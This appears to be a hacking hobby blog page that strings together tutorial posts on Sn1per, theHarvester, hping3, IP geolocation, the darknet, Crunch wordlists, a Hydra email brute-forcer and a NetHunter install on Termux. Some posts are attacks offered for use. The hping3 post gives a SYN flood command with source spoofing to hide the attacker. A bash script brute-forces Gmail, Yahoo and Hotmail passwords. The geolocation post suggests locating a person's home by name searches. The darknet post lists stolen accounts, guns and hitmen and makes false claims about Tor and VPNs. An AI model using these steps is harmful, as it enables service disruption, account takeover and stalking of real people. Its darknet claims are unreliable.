Aye guys, it’s me IRISnoir and made another part of the iptables tutorial. Hope you guys enjoy 🙂
Thursday, June 27, 2019
Tuesday, June 25, 2019
How to use Sniper
welcome to Hacking A Rise i am the laughing man wit another tutorial this time on sniper automated scanner
What is sniper
Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information ,
go to find out more
FEATURES
– [x] Automatically collects basic recon (ie. whois, ping, DNS, etc.)
– [x] Automatically launches Google hacking queries against a target domain
– [x] Automatically enumerates open ports via NMap port scanning
– [x] Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
– [x] Automatically checks for sub-domain hijacking
– [x] Automatically runs targeted NMap scripts against open ports
– [x] Automatically runs targeted Metasploit scan and exploit modules
– [x] Automatically scans all web applications for common vulnerabilities
– [x] Automatically brute forces ALL open services
– [x] Automatically test for anonymous FTP access
– [x] Automatically runs WPScan, Arachni and Nikto for all web services
– [x] Automatically enumerates NFS shares
– [x] Automatically test for anonymous LDAP access
– [x] Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
– [x] Automatically enumerate SNMP community strings, services and users
– [x] Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
– [x] Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
– [x] Automatically tests for open X11 servers
– [x] Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
– [x] Performs high level enumeration of multiple hosts and subnets
– [x] Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
– [x] Automatically gathers screenshots of all web sites
– [x] Create individual workspaces to store all scan output
– [x] Drupal RESTful Web Services unserialize() SA-CORE-2019-003
– [x] Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts
– [x] Drupal: CVE-2018-7600: Remote Code Execution – SA-CORE-2018-002
– [x] GPON Routers – Authentication Bypass / Command Injection CVE-2018-10561
– [x] MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
– [x] Apache Tomcat: Remote Code Execution (CVE-2017-12617)
– [x] Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271
– [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)
– [x] Apache Struts 2 Framework Checks – REST plugin with XStream handler (CVE-2017-9805)
– [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)
– [x] Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269
– [x] ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249
– [x] Shellshock Bash Shell remote code execution CVE-2014-6271
– [x] HeartBleed OpenSSL Detection CVE-2014-0160
– [x] MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)
– [x] Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843
– [x] MS08-067 Microsoft Server Service Relative Path Stack Corruption
– [x] Webmin File Disclosure CVE-2006-3392
– [x] VsFTPd 2.3.4 Backdoor
– [x] ProFTPd 1.3.3C Backdoor
– [x] MS03-026 Microsoft RPC DCOM Interface Overflow
– [x] DistCC Daemon Command Execution
– [x] JBoss Java De-Serialization
– [x] HTTP Writable Path PUT/DELETE File Access
– [x] Apache Tomcat User Enumeration
– [x] Tomcat Application Manager Login Bruteforce
– [x] Jenkins-CI Enumeration
– [x] HTTP WebDAV Scanner
– [x] Android Insecure ADB
– [x] Anonymous FTP Access
– [x] PHPMyAdmin Backdoor
– [x] PHPMyAdmin Auth Bypass
– [x] OpenSSH User Enumeration
– [x] LibSSH Auth Bypass
– [x] SMTP User Enumeration
– [x] Public NFS Mounts
How to install Sniper
right lads open terminal and type git clone https://github.com/1N3/Sn1per.git 
now type cd Sn1per
now you wanna gave the install.sh promissions to run in the system so type chmod +x install.sh this ./install.sh 
(Press Enter )
(let it finish )
How to use Sniper
right since you mead it this far ya didnt brake the pc/laptop hahaha no we cd back to home before and type sniper --help 
now lets try a normal scan type sniper -t url 
okiedokie lets try a osint scan type sniper -t 
ok now a recon scan type sniper -t 
now we are going to try a osint and recon scan on hacking a rise site type sniper -t 
right lads the last one i am going to show ye is the brute in sniper so type sniper -t 
And the recon osint with brute
heres the rest the commands lads
[*] NORMAL MODE
sniper -t|–target
[*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE
sniper -t|–target
[*] STEALTH MODE + OSINT + RECON
sniper -t|–target
[*] DISCOVER MODE
sniper -t|–target
[*] FLYOVER MODE
sniper -t|–target
[*] AIRSTRIKE MODE
sniper -f|–file /full/path/to/targets.txt -m|–mode airstrike
[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace
[*] SCAN ONLY SPECIFIC PORT [*] FULLPORTONLY SCAN MODE [*] PORT SCAN MODE [*] WEB MODE – PORT 80 + 443 ONLY! [*] HTTP WEB PORT HTTP MODE [*] HTTPS WEB PORT HTTPS MODE [*] WEBSCAN MODE [*] ENABLE BRUTEFORCE [*] ENABLE LOOT IMPORTING INTO METASPLOIT [*] LOOT REIMPORT FUNCTION [*] LOOT REIMPORTALL FUNCTION [*] DELETE WORKSPACE [*] DELETE HOST FROM WORKSPACE [*] SCHEDULED SCANS’ [*] SCAN STATUS [*] UPDATE SNIPER right lads listen hope this comes in handy i will do a video on this in the next coming days so make sure keep a eye on facebook and discord for that and dont forget to sub to the site to be the first to view are posts 🙂 HAPPY HACKING LAUGHINGMAN
sniper -t|–target
sniper -t|–target
sniper -t|–target
sniper -t|–target
sniper -t|–target
sniper -t|–target
sniper -t|–target
sniper -t|–target
sniper -t|–target
sniper -w
sniper -w
sniper -w
sniper -w
sniper -w
sniper –status
sniper -u|–update
Make a program that flips a coin in Python 3
Welcome back to another tutorial, today we will be making a script that flips a coin and randomly selects heads or tails.
To start, make a new python file and name it CoinFlip, once you’ve done that you will need to import the random module. Add the following to the first line of code:
import random
Once you’ve done that you will want to make a string named “coin” and set it equal to a list that includes, “heads” and “tails”. the string should look something like this:
coin = [‘heads’, ‘tails’]
Once you have completed that step only two more to go. You should now be able to print the string coin”
but before you do that you need to make the program select one of the options in the list, to do this enter
the following code:
print(random.choice(coin))
Once that is put into the code, you will now be able to run it and get heads or tails, feel free to run it as
much as you like to make sure it’s random.
I hope you enjoyed today’s tutorial, stay tuned for some more awesome tutorials.
All Code:
import random
coin = [‘heads’, ‘tails’]
print(random.choice(coin))
Sunday, June 23, 2019
The harvester
Welcome to hacking a rise hacking a rise I am the Laughingman here with another post this time on getting emails of a domain using harvester this comes in handy for recon so lets get started
What is The Harvester
The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.
This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.
This is a complete rewrite of the tool with new features like:
Time delays between request
All sources search
Virtual host verifier
Active enumeration (DNS enumeration, Reverse lookups, TLD expansion)
Integration with SHODAN computer database, to get the open ports and banners
Save to XML and HTML
Basic graph with stats
New sources
Source: https://github.com/laramies/theHarvester/
theHarvester Homepage | Kali theHarvester Repo
How to use The Harvester
Right lads using this is so simple a 4 year old can do it so open terminal and type theharester
so befor i show you how to use the tool let me explain the santax of the command -d is the domain of target -l in the ammount emails u wanna find -b is the search engine you want to use there a few you can use with out api like google,bing,yahoo etc …
so in terminal type thehasrvester -d facebook.com -l 100 -d google 
lets see what yahoo gaves use the same command agen but add yahoo to the -b
so say you want to save your results well we can as a html file or xml im going to save mine as htmland search with google yahoo and bing so type theharvester -d facebook.com -b google,bing,yahoo -l 50 -f facebookemails.html
what thats going to do see search on google,bing,yahoo for any email related to facebook.com and save to ur root dir as a html file you can view it in the browser by clicking
it
Disclamer
hacking a rise dont take responsibility of any there viewers actions as this purely educational .
there you have it lad simple right till the next one laughingman out
How to dos with Hping3
welcome to hacking a rise I am the one and only Laughingman in this post Im going to show u the basics of Hping3
What is Hping3
Hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols.
What Hping is used for
Test firewall rules
Advanced port scanning
Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
Path MTU discovery
Transferring files between even really fascist firewall rules.
Traceroute-like under different protocols.
Firewalk-like usage.Test firewall rules
Advanced port scanning
Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
Path MTU discovery
Transferring files between even really fascist firewall rules.
Traceroute-like under different protocols.
Firewalk-like usage.
How to use Hping3
lets start with the help menu so type hping3 --help in to terminal
Right lads let start with a simple icmp scan what this dose is send icmp pings to target (icmp stand for its internet control message protocol) so open terminal and type hping3 192.168.8.1 
so next we wanna check the tcp packages of the target so what this next command dose is send the icmp ping to port 443 so type hping3 192.168.8.1 -c 10 -p 443 -c is the amount package you want to send to the target -p is the port to send them to
If you wanna look at a more detailed report so type hping3 192.168.8.1 -c 10 -p 443 -V
so now we get to the part you all click on this post to see how to dos with Hping3 WHOOP WHOOP
so open terminal and typehping3 -S --flood -V 192.168.8.1 
-S Sets SYN tcp flag.Which mean you are sending syn packets.
–flood Sends lots of packets and ignore the response.it sends packets as fast as possible.
After few minutes when hping3 floods system with lots of packets he will be forced to quit network.
so say we want to hide were the dos is coming from type this command to terminalhping3 -S -U --flood --rand-source -V 192.168.8.1
DISCLAMER
dont be a dick head we take no responsibility for any actions taking by are viewers we do not condole any non legal actions as were purely for educational reasons
Thats it lads hope you enjoyed this post make sure the share and check out are discord link in in menu and join use on facebook and twitter dont forget to sub to the blog to be the first to know when a new post is posted all the best lads ~Laughingman
Termux Tutorial: IPtables (Part 2-3 - IPtables usage)
welcome to hacking a rise im X-termux (irisnoir )in this video i show you how to use iptables in termux
Get a location with an IP adress
Get a Location using an IP adress
Hey guys ! Lasr here 🙂
Today I’m gonna show you how to get the approximate location of an IP with iplocation.net.
For this tutorial, you will need : A computer/smartphone/tablet with any OS on it, an internet connection and a photo editing software.
SPOILER : you can't get the exact position of someone with such simple tools, if you want his house adress, then make searches on his full name and find his house by his name.
First of all, you need an IP, you can either get it via an IP grabber or via an IP finder (tutorial for a python IP finder here).
Then, go to iplocation.net and put the IP on the text input area on the top (step 1) and click on the “IP Lookup” on the right of the input.
After that, wait until the geolocation data from the three sites below loads. As you can see, we already have 3 locations from the IP; 2 from the same City (Las Vegas) and 1 from New York, why, you might ask, and that’s because the location is closest antenna from the site.
If you just want the country of the guy, then you can stop here, if you want to have his department or his city if you’re lucky enough, then go further.
I will cover 2 techniques :
– the average (better for lines cuz it)
– the triangulation (better for more than 2 points on the map)
1st of, the average, it consists of making the average (thanks captain obvious lmao).
It’s better for 2 points or in some cases when more (when we have points at the start and end of the line but not inside) as in my exemple.
1st Step :
Open this site and put first the latitude in the text input box as shown below. (1)
Then copy the sum (2), open notepad and paste the sum.
Then do the exact same for the Longitude.
2nd Step :
For the 2nd and last step, put the Latitude and Longitude in google maps and see the result.
And boom ! You’re done ! Now let’s get to the 2nd method, the map triangulation.
1st Step :
Open google maps and paste the 1st location, unzoom till you can see the whole country (if the results are from the same country, else unzoom until you can see all of the countries listed on iplocation.net for the IP)
Take a screen, download it, and do the same for all of the other location.
2nd Step :
Then, link all of your results and take the location of the cross made by the lines making a cross.
Red = the 3 locations
Blue = triangulation method
Green = average method
As I said I have a line so this makes this solution not efficient for my case because it’s just a line, and it is a random point in it.
If you have a triangle, then make a point in the middle of the 3 lines that you have, and link all of the old points to the new ones as shown below
A, B, C = Location Points
A’, B’, C’ = New Points
F = Point made by the triangulation
If the lines don’t cross and form a triangle, repeat the process.
Hopefully you now know how to find the location of an IP adress ! 🙂
And that’s it, Lasr out !
Darknet part 1
hi and thankyou for joining us to night on darks dark guide to the dark net ( hahaha) for those that get the pun well done!!!! for the other younger members/readers its a pun from hitch hikers guide to the galaxy!! any way moving on
as the title say’s this is the 1st part of many parts of darknet what is it how to stay safe various ways to access it and maybe one of the last parts will be on how to actually hack the dark net!!!
any way todays blog post what ever you wanna call it is just a quick and simple way on actually accessing the dark net i have seen it countless times on fb ” how to access dark net” “what is darknet” and then the scammers jump on it and well you know the story ends!!!
first thing first for this guide i am using linux but if you use windows then i will show you the links and dig up some screen shots but basically no matter what OS you use its the same process but Windows you just download the tor browser install and open it simple!!!!
ok first thing first quick leture we here at hackingarise do not and will not take any responsibility for any of your actions on the darknet if you get busted then its your own fault this is just a guide only if you decided to actually follow it and well buy something you should’nt and get arrested well basically grow a pair and deal with it simple as
ok now that is over and done with lets get on with it shall we
what is the darknet
well the dark net is quite simply putting it the dark side of the massive world of internet
the dark net/deep web what ever you wanna call it refers to a bunch of networks ( stuff like google bing yahoo) that can’t and will not be indexed on stuff again like google etc eg if you type in “hitman for hire” on google this is what your going to get
litterally a bunch of links that well are telling you about the dark net as for legal reasons you can’t go on the net and say fuck it i am putting a contract on some one today and pay a massive lump sum of money and well everyone is happy!!!
so thats where the darknet now comes in to it BUT be warned darknet is now broken NSA FBI hackers scammers run the darknet so if you look on there and see some paypal accounts and think hmm i can use some extra money becareful as 1 you might be walking in to a scammer page 2 it could be NSA page NO MATTER WHAT COUNTRY YOUR IN THEY WILL ARREST YOU!!! so if you think your govement wont do anything think again NSA do not care they will grab you no matter what
quick guide to what you can actually buy
loaded pay pal accounts
bank account details
guns
drugs
porn
“red room specials”
and trust me when i say this and this part is only for the people who have strong stomach you can hire scientists that basically kidnap people mainly homeless people and preform any formula you send them and they send you hour by hour details of what it does to people and will tweak it until its to how you want
“hitmen”
and well pretty much anything you want
ok how to access it
well first thing first its not something that you can just open like firefox chrome etc you need to take extra procaution as there are things called entry nodes and exit nodes
entry nodes basically put your ip address and everything else in to a bag and send it to the tor servers and then mix it up with millions of others details and makes you “1%” anonymous but these nodes 99% are mixed with payloads from hackers NSA tracers that basically lock on to you the second you log on
exit nodes basically closes the door but there again same as entry nodes so i wont repeat my self on that one
1st thing you are going to need which is well the most important thing possible is a VPN
the only VPN that i personally trust and after doing months of research on this subject and now highly comes recommend is nordvpn
as you can clearly see under netherlands it supports onion servers which means you can access dark net on them if you dont believe me you can try and ask every other vpn service provider but they will say no! simple as that so nordvpn is a high prioty
2nd your going to need a browser called tor which is located here https://www.torproject.org/
windows users just download it
this is what you will be faced with
as you can see just quckly press save and download once downloaded simply head to the download file or where ever you saved it simply right click and hit extract to here
you will have two folders the tar file and tor browser
once you opened the tor broweser file you will see these two options quite simply double click ont the blue circle
hit connect
as you can see its now conecting you to the dark net
ok now this is the tor browser never ever on this planet run it full screen this default screen size is good enough plus never download anything always use 10 minute email if you need to sign up to anything always use a different username so nsa can’t pin point you on everything common sense really
anyway your on the dark net just looks like firefox dont it?
wrong type in the search bar on duckduckgo hidden wiki and this is the darknet as you can see everything now ends in .onion
this is one of milliions of links for the dark net as you can see everything you cant find on google is there and everything ends in .onion
well if you want more links then i suggest you either look on darknet just type in .onion links or simply google them as i wont be posting any links
well thats all for now stay tuned and i will be doing more later today at some point on various ways of connecting to tor via running 2 virtual machines
stay tuned
dark
Saturday, June 22, 2019
Termux Tutorial: IPtables (Part 2-2 - IPtables usage)
welcome to hacking a rise in this video i show u how to set up IP tables
Termux Tutorial: IPtables (Part 2-1 - IPtables usage)
welcome to hacking a rise in this video i show u how to set up IP tables
Termux Tutorial:IPtables (Part 1 - Introduction to IPtables)
This video will teach you how to use IPtables in Termux like a boss
Termux Tutorial: arp-scan and arp-fingerprint
welcome to hacking a rise I am X-termux in this video i show u how to perform a arp scan and fingerprint in termux on android
Friday, June 21, 2019
how to use Crunch
welcome to hacking a rise im the laughingman in this post im going to show you how to make word lists using crunch pre installed on Kali Linux
(Note) this is a outdated method but saying that lads we still use the same way brute forcing and making word-lists always be the same in saying that the method will never change i think dont quote me on it as we never know what going to happen but for now its something to think of the old ways are sometimes the best lol
What is crunch
Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations. Features: crunch generates wordlists in both combination and permutation ways. it can breakup output by number of lines or file size.
Why hackers use password lists
Hackers use password lists to brute things like log ins and wifi password as well as ssh brute so on as we do not know the password we depend on a re wordlists (password lists) to gain the pass to the accounts , ssh etc….
How to use crunch
First we start with the man page this the manual provided but crunch many tools like nmap metasploit etc have manuals to get it type man crunch 
now we move on to making a simple word list so in terminal type crunch 4 8 -o /root/Desktop/ this make a world list starting with aaa and end in zzzzzzzz this make a basic word-list with crunch
so lets say we need one for wps we can also make a word list with numbers so in terminal type crunch 1234567890 -o /root/Desktop/
so next we have to look this way right u have a target and u know the charset of the password i mean like say all u know is it has there bday or there kids or there wifes so on we can use crunch to make a word list to have it at the end im be using 2k18 for this type crunch -t @@@@@@2k18 -o /root/Desktop/ 
right lad now we move on to complex list is the the likes of wpa2 password or if your target has a strong password so to do this we are going to use rainbow tables charsets so type this to the terminal crunch 4 10 -f /usr/share/rainbowtables/charset.txt mixalpha -o /root/Desktop/ 
Disclamer
this is purely for educational reasons we take no responsibility for you actions or anyone’s actions
right lads there ya go hope ya find it useful in your study’s i am the Laughingman and this was how to use crunch so god bless lads and HAPPY HACKING WHOOP WHOOP
bash make a simple email-bruter
welcome to hacking a rise I’m the Laughingman here to teach ya how to make a simple script for brute forcing emails using hydra it mite work it mite not work but the main thing is you are learning bash so lets go on ….
What is bash
Bash is a Unix shell and command language written by Brian Fox for the GNU Project as a free software replacement for the Bourne shell. First released in 1989, it has been distributed widely as the default login shell for most Linux distributions and Apple’s macOS
FIND OUT MORE HERE
the bash santax we will be using
writing the script
So open your fav text editor and strat with the frist part the script
- #!/bin/bash
then we add figlet for a banner
- figlet email-knocker
then are echo commands
- echo “hacking a rise ”
echo “mead by laughingman ”
echo “make sure you have your wordlist handy”
echo “Lets go”
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
now are we add read
- read smtp
and the rest
- echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist
then we add hydra commands with $ to tell the system to use the email and wordlist we typed in
- hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
now we save it as a .sh file
right to run the file go to were its saves mines in desktop so i go to my desktop and right click open in terminal and type chmod +x emailknocker.sh then ./emailknocker.sh to run it
and it should look something like this
Thursday, June 20, 2019
install nethunter on termux
welcome back to hacking a rise in this post im going to show you how to install nethunter the right way in termux with out any errors
what is termux
Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically – additional packages are available using the APT package manager.
what is nethunter
Kali NetHunter is an Android ROM overlay that includes a mobile penetration testing platform. It is officially available for download on newer Nexus devices and the OnePlus One, as well as some Samsung Galaxy models. It also works unofficially on other phones
installing termux
download termux of the playstore here
then install hackers keyboard here
installing nethunter
to install nethunter first type pkg install curl -y
Now copy and paste this to termux
curl -LO https://raw.githubusercontent.com/Hax4us/Nethunter-InTermux/master/kalinethunter
Now type chmod +x kalinethunter
Then ./kalinethunter let it download
Once done type startkali
Then you see root@kali its istallex net we app the keys
So type wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
Then apt install ./kali-archive-keyring_2018.1_all.deb
there ya have it lads just apt-get install kali-linux-full and u got a full kali toolset inside your termux
Subscribe to:
Posts (Atom)